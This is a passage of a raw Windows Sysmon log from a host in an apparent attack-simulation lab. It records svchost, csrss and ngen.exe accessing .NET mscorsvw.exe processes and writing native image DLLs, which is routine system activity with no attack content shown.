84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:25.421{59A5CD1D-916D-6005-7102-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\844-0\System.Device.dll2021-01-18 13:47:25.421 10341000x80000000000000006647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.343{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916D-6005-7102-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.328{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916D-6005-7102-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:25.328{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916D-6005-7102-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.296{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916D-6005-7002-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.281{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916D-6005-7002-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:25.281{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916D-6005-7002-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.937{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7802-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.937{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7802-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:26.937{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7802-00000000A301}808C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:26.874{59A5CD1D-916E-6005-7702-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\117c-0\System.Drawing.Design.dll2021-01-18 13:47:26.874 10341000x80000000000000006668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:26.718{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7702-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.703{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7702-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:26.703{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7702-00000000A301}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.656{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.656{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+8
4d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:26.593{59A5CD1D-916E-6005-7502-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\dac-0\System.DirectoryServices.Protocols.dll2021-01-18 13:47:26.593 10341000x80000000000000006661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.281{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7502-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.265{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7502-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:26.265{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7502-00000000A301}3500C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.234{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916E-6005-7402-00000000A301}1340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000006657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.234{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-916E-6005-7402-00000000A301}1340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:26.234{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916E-6005-7402-00000000A301}1340C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:26.156{59A5CD1D-916D-6005-7302-00000000A301}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a0c-0\System.DirectoryServices.AccountManagement.dll2021-01-18 13:47:26.156 10341000x80000000000000006682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:27.421{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:27.421{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-916F-6005-7B02-00000000A301}1376C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 